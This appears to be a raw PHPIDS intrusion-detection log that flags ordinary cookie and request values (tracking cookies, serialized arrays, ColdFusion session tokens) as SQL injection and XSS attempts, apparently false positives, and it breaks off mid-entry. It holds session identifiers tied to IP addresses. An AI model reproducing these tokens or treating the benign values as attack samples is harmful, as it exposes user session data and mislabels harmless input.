Value:a:4:{i:0;s:72:"/news/view/educators_see_secure_coding_training_challenges_improvements/";i:1;s:91:"/site/berichten/20091106_marcom_debat_2009_expertteams_sneller_beter_en_flexibeler_of_niet/";i:2;s:55:"/weblog/artikel/Deutschsprachige-Twitter-Einfuehrungen/";i:3;s:25:"/post/fluid_theme_is_out/";}
Page:/i.php?page=videos%2Fpn12%2Fhandgrip-buttstock-open-source-ak-47s
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59070
Name:REQUEST.ci_session
Value:a:4:{s:10:"session_id";s:32:"1672b96a43831ea3baaf4358041196a8";s:10:"ip_address";s:12:"78.46.48.168";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671883";}5d4fd76ea4eebf05e1aeece2a44309d1
Page:/i.php?page=videos%2Fpn12%2Fhandgrip-buttstock-open-source-ak-47s
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59071
Name:COOKIE.PREF
Value:ID=5fdb30591a25309b:TM=1257607342:LM=1257607342:S=is5eulZ3IC_MbxX7
Page:/i.php?page=videos%2Fpn12%2Fhandgrip-buttstock-open-source-ak-47s
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59072
Name:COOKIE.language
Value:--
Page:/i.php?page=videos%2Fpn12%2Fhandgrip-buttstock-open-source-ak-47s
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59073
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=1647430&CFTOKEN#=92479335&jsessionid#=3030d05bc6ccb8b34fbf6482925a9651f201#lastvisit={ts '2009-11-07 07:03:30'}#timecreated={ts '2009-11-07 07:03:30'}#hitcount=3#cftoken=92479335#cfid=1647430#
Page:/i.php?page=videos%2Fpn12%2Fhandgrip-buttstock-open-source-ak-47s
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59074
Name:COOKIE.cm__tracker
Value:a:2:{i:0;s:26:"/gallery/entry/2891/duall/";i:1;s:38:"/gallery/entry/2928/eye-design-studio/";}
Page:/i.php?page=videos%2Fpn12%2Fhandgrip-buttstock-open-source-ak-47s
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59075
Name:COOKIE.DB
Value:msRandX=79&ItemDetailsBeta=Y&msProduct=1782427&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150C.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150C.jpg
Page:/i.php?page=videos%2Fpn12%2Fhandgrip-buttstock-open-source-ak-47s
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59076
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=3975924&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fpn12%2Fhandgrip-buttstock-open-source-ak-47s
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59077
Name:COOKIE.exp_tracker
Value:a:4:{i:0;s:72:"/news/view/educators_see_secure_coding_training_challenges_improvements/";i:1;s:91:"/site/berichten/20091106_marcom_debat_2009_expertteams_sneller_beter_en_flexibeler_of_niet/";i:2;s:55:"/weblog/artikel/Deutschsprachige-Twitter-Einfuehrungen/";i:3;s:25:"/post/fluid_theme_is_out/";}
Page:/i.php?page=videos%2Fpn12%2Fhandgrip-buttstock-open-source-ak-47s
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59078
Name:COOKIE.ci_session
Value:a:4:{s:10:"session_id";s:32:"1672b96a43831ea3baaf4358041196a8";s:10:"ip_address";s:12:"78.46.48.168";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671883";}5d4fd76ea4eebf05e1aeece2a44309d1
Page:/i.php?page=videos%2Fpn12%2Fhandgrip-buttstock-open-source-ak-47s
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59079
Name:REQUEST.PREF
Value:ID=2a20af7ba02c1227:TM=1257607103:LM=1257607103:S=m7nyIKMhN_dK5vrC
Page:/i.php?page=videos%2Fpn12%2Fdaniel-hooper-an-introduction-to-software-defined-radio-by-cowboy-dan
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59080
Name:REQUEST.language
Value:--
Page:/i.php?page=videos%2Fpn12%2Fdaniel-hooper-an-introduction-to-software-defined-radio-by-cowboy-dan
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59081
Name:REQUEST.DB
Value:msRandX=40&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=videos%2Fpn12%2Fdaniel-hooper-an-introduction-to-software-defined-radio-by-cowboy-dan
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59082
Name:REQUEST.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5279700&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fpn12%2Fdaniel-hooper-an-introduction-to-software-defined-radio-by-cowboy-dan
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59083
Name:REQUEST.cm__tracker
Value:a:1:{i:0;s:32:"/gallery/entry/2922/blik-studio/";}
Page:/i.php?page=videos%2Fpn12%2Fdaniel-hooper-an-introduction-to-software-defined-radio-by-cowboy-dan
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59084
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=2643170&CFTOKEN#=b253aefffaabcf5a-CEE8602B-DE01-8119-4A635C6373229D52&jsessionid#=30303df16bea44d8c25415225e66186b3738#lastvisit={ts '2009-11-07 15:45:40'}#timecreated={ts '2009-11-07 10:17:22'}#hitcount=12#cftoken=b253aefffaabcf5a-CEE8602B-DE01-8119-4A635C6373229D52#cfid=2643170#
Page:/i.php?page=videos%2Fpn12%2Fdaniel-hooper-an-introduction-to-software-defined-radio-by-cowboy-dan
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59085
Name:REQUEST.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20356
Page:/i.php?page=videos%2Fpn12%2Fdaniel-hooper-an-introduction-to-software-defined-radio-by-cowboy-dan
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59086
Name:REQUEST.exp_tracker
Value:a:4:{i:0;s:92:"/site/berichten/20091106_michiel_veenstra_3fm_social_is_een_heel_belangrijk_deel_van_mijn_l/";i:1;s:48:"/site/article/remove-the-buy-local-tax-on-books/";i:2;s:67:"/apple/comment/fortune-magazine-names-steve-jobs-ceo-of-the-decade/";i:3;s:43:"/weblog/artikel/Fever-Feeds-mit-Temperatur/";}
Page:/i.php?page=videos%2Fpn12%2Fdaniel-hooper-an-introduction-to-software-defined-radio-by-cowboy-dan
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59087
Name:REQUEST.CommunityServer-UserCookie1001
Value:lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=11/7/2009 3:46:30 PM
Page:/i.php?page=videos%2Fpn12%2Fdaniel-hooper-an-introduction-to-software-defined-radio-by-cowboy-dan
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59088
Name:REQUEST.Apache
Value:"D~8f9483ec2747dc8c7bcc3a33b91812a7"
Page:/i.php?page=videos%2Fpn12%2Fdaniel-hooper-an-introduction-to-software-defined-radio-by-cowboy-dan
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.3333333333333

ID:59089
Name:REQUEST.OAGEO
Value:DE||||||||||
Page:/i.php?page=videos%2Fpn12%2Fdaniel-hooper-an-introduction-to-software-defined-radio-by-cowboy-dan
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects obfuscated JavaScript script injections | Tags: xss, csrf | ID: 25

ID:59090
Name:COOKIE.PREF
Value:ID=2a20af7ba02c1227:TM=1257607103:LM=1257607103:S=m7nyIKMhN_dK5vrC
Page:/i.php?page=videos%2Fpn12%2Fdaniel-hooper-an-introduction-to-software-defined-radio-by-cowboy-dan
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59091
Name:COOKIE.language
Value:--
Page:/i.php?page=videos%2Fpn12%2Fdaniel-hooper-an-introduction-to-software-defined-radio-by-cowboy-dan
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59092
Name:COOKIE.DB
Value:msRandX=40&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=videos%2Fpn12%2Fdaniel-hooper-an-introduction-to-software-defined-radio-by-cowboy-dan
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59093
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5279700&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fpn12%2Fdaniel-hooper-an-introduction-to-software-defined-radio-by-cowboy-dan
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59094
Name:COOKIE.cm__tracker
Value:a:1:{i:0;s:32:"/gallery/entry/2922/blik-studio/";}
Page:/i.php?page=videos%2Fpn12%2Fdaniel-hooper-an-introduction-to-software-defined-radio-by-cowboy-dan
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59095
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=2643170&CFTOKEN#=b253aefffaabcf5a-CEE8602B-DE01-8119-4A635C6373229D52&jsessionid#=30303df16bea44d8c25415225e66186b3738#lastvisit={ts '2009-11-07 15:45:40'}#timecreated={ts '2009-11-07 10:17:22'}#hitcount=12#cftoken=b253aefffaabcf5a-CEE8602B-DE01-8119-4A635C6373229D52#cfid=2643170#
Page:/i.php?page=videos%2Fpn12%2Fdaniel-hooper-an-introduction-to-software-defined-radio-by-cowboy-dan
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59096
Name:COOKIE.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20356
Page:/i.php?page=videos%2Fpn12%2Fdaniel-hooper-an-introduction-to-software-defined-radio-by-cowboy-dan
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59097
Name:COOKIE.exp_tracker
Value:a:4:{i:0;s:92:"/site/berichten/20091106_michiel_veenstra_3fm_social_is_een_heel_belangrijk_deel_van_mijn_l/";i:1;s:48:"/site/article/remove-the-buy-local-tax-on-books/";i:2;s:67:"/apple/comment/fortune-magazine-names-steve-jobs-ceo-of-the-decade/";i:3;s:43:"/weblog/artikel/Fever-Feeds-mit-Temperatur/";}
Page:/i.php?page=videos%2Fpn12%2Fdaniel-hooper-an-introduction-to-software-defined-radio-by-cowboy-dan
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59098
Name:COOKIE.CommunityServer-UserCookie1001
Value:lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=11/7/2009 3:46:30 PM
Page:/i.php?page=videos%2Fpn12%2Fdaniel-hooper-an-introduction-to-software-defined-radio-by-cowboy-dan
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59099
Name:COOKIE.Apache
Value:"D~8f9483ec2747dc8c7bcc3a33b91812a7"
Page:/i.php?page=videos%2Fpn12%2Fdaniel-hooper-an-introduction-to-software-defined-radio-by-cowboy-dan
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.3333333333333

ID:59100
Name:COOKIE.OAGEO
Value:DE||||||||||
Page:/i.php?page=videos%2Fpn12%2Fdaniel-hooper-an-introduction-to-software-defined-radio-by-cowboy-dan
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects obfuscated JavaScript script injections | Tags: xss, csrf | ID: 25

ID:59101
Name:REQUEST.PREF
Value:ID=2a20af7ba02c1227:TM=1257607103:LM=1257607103:S=m7nyIKMhN_dK5vrC
Page:/i.php?page=videos%2Fpn12%2Fdarren-kitchen-lessons-learned-in-hacker-media
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59102
Name:REQUEST.language
Value:--
Page:/i.php?page=videos%2Fpn12%2Fdarren-kitchen-lessons-learned-in-hacker-media
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59103
Name:REQUEST.DB
Value:msRandX=40&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=videos%2Fpn12%2Fdarren-kitchen-lessons-learned-in-hacker-media
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59104
Name:REQUEST.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5279700&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fpn12%2Fdarren-kitchen-lessons-learned-in-hacker-media
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59105
Name:REQUEST.cm__tracker
Value:a:1:{i:0;s:32:"/gallery/entry/2922/blik-studio/";}
Page:/i.php?page=videos%2Fpn12%2Fdarren-kitchen-lessons-learned-in-hacker-media
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59106
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=2643170&CFTOKEN#=b253aefffaabcf5a-CEE8602B-DE01-8119-4A635C6373229D52&jsessionid#=30303df16bea44d8c25415225e66186b3738#lastvisit={ts '2009-11-07 15:45:40'}#timecreated={ts '2009-11-07 10:17:22'}#hitcount=12#cftoken=b253aefffaabcf5a-CEE8602B-DE01-8119-4A635C6373229D52#cfid=2643170#
Page:/i.php?page=videos%2Fpn12%2Fdarren-kitchen-lessons-learned-in-hacker-media
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59107
Name:REQUEST.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20356
Page:/i.php?page=videos%2Fpn12%2Fdarren-kitchen-lessons-learned-in-hacker-media
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59108
Name:REQUEST.exp_tracker
Value:a:4:{i:0;s:92:"/site/berichten/20091106_michiel_veenstra_3fm_social_is_een_heel_belangrijk_deel_van_mijn_l/";i:1;s:48:"/site/article/remove-the-buy-local-tax-on-books/";i:2;s:67:"/apple/comment/fortune-magazine-names-steve-jobs-ceo-of-the-decade/";i:3;s:43:"/weblog/artikel/Fever-Feeds-mit-Temperatur/";}
Page:/i.php?page=videos%2Fpn12%2Fdarren-kitchen-lessons-learned-in-hacker-media
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59109
Name:REQUEST.CommunityServer-UserCookie1001
Value:lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=11/7/2009 3:46:30 PM
Page:/i.php?page=videos%2Fpn12%2Fdarren-kitchen-lessons-learned-in-hacker-media
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59110
Name:REQUEST.Apache
Value:"D~8f9483ec2747dc8c7bcc3a33b91812a7"
Page:/i.php?page=videos%2Fpn12%2Fdarren-kitchen-lessons-learned-in-hacker-media
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.3333333333333

ID:59111
Name:REQUEST.OAGEO
Value:DE||||||||||
Page:/i.php?page=videos%2Fpn12%2Fdarren-kitchen-lessons-learned-in-hacker-media
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects obfuscated JavaScript script injections | Tags: xss, csrf | ID: 25

ID:59112
Name:COOKIE.PREF
Value:ID=2a20af7ba02c1227:TM=1257607103:LM=1257607103:S=m7nyIKMhN_dK5vrC
Page:/i.php?page=videos%2Fpn12%2Fdarren-kitchen-lessons-learned-in-hacker-media
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59113
Name:COOKIE.language
Value:--
Page:/i.php?page=videos%2Fpn12%2Fdarren-kitchen-lessons-learned-in-hacker-media
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59114
Name:COOKIE.DB
Value:msRandX=40&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=videos%2Fpn12%2Fdarren-kitchen-lessons-learned-in-hacker-media
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59115
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5279700&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fpn12%2Fdarren-kitchen-lessons-learned-in-hacker-media
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59116
Name:COOKIE.cm__tracker
Value:a:1:{i:0;s:32:"/gallery/entry/2922/blik-studio/";}
Page:/i.php?page=videos%2Fpn12%2Fdarren-kitchen-lessons-learned-in-hacker-media
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59117
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=2643170&CFTOKEN#=b253aefffaabcf5a-CEE8602B-DE01-8119-4A635C6373229D52&jsessionid#=30303df16bea44d8c25415225e66186b3738#lastvisit={ts '2009-11-07 15:45:40'}#timecreated={ts '2009-11-07 10:17:22'}#hitcount=12#cftoken=b253aefffaabcf5a-CEE8602B-DE01-8119-4A635C6373229D52#cfid=2643170#
Page:/i.php?page=videos%2Fpn12%2Fdarren-kitchen-lessons-learned-in-hacker-media
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59118
Name:COOKIE.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20356
Page:/i.php?page=videos%2Fpn12%2Fdarren-kitchen-lessons-learned-in-hacker-media
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59119
Name:COOKIE.exp_tracker
Value:a:4:{i:0;s:92:"/site/berichten/20091106_michiel_veenstra_3fm_social_is_een_heel_belangrijk_deel_van_mijn_l/";i:1;s:48:"/site/article/remove-the-buy-local-tax-on-books/";i:2;s:67:"/apple/comment/fortune-magazine-names-steve-jobs-ceo-of-the-decade/";i:3;s:43:"/weblog/artikel/Fever-Feeds-mit-Temperatur/";}
Page:/i.php?page=videos%2Fpn12%2Fdarren-kitchen-lessons-learned-in-hacker-media
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59120
Name:COOKIE.CommunityServer-UserCookie1001
Value:lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=11/7/2009 3:46:30 PM
Page:/i.php?page=videos%2Fpn12%2Fdarren-kitchen-lessons-learned-in-hacker-media
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
